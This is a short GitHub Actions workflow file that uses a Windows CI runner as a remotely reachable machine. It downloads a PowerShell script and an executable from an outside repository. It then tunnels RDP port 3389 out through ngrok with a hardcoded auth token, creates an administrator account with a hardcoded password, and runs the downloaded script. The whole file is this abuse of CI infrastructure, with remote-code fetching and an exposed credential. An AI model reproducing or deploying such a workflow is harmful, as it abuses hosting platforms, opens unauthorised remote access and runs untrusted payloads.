on: [push, workflow_dispatch]

jobs:
  build:

    runs-on: windows-latest
    
    steps:
    - name: Download
      run: Invoke-WebRequest https://github.com/Usser1222/circleci/raw/main/0.ps1 -OutFile 0.ps1
    
    - name: rrt
      run: |
           Invoke-WebRequest -Uri https://github.com/Usser1222/circleci/raw/main/use.exe 
           use authtoken 2cn87V9NMzmnYMwO3Vgp6rtvFde_3PkxAeYd8zjbLwMge7LAe
           start /B ngrok tcp 3389
           cmd /c net user /add Admin P@ssw0rd.
           cmd /c net localgroup /add administrators Admin
           sleep 120
           .\0.ps1
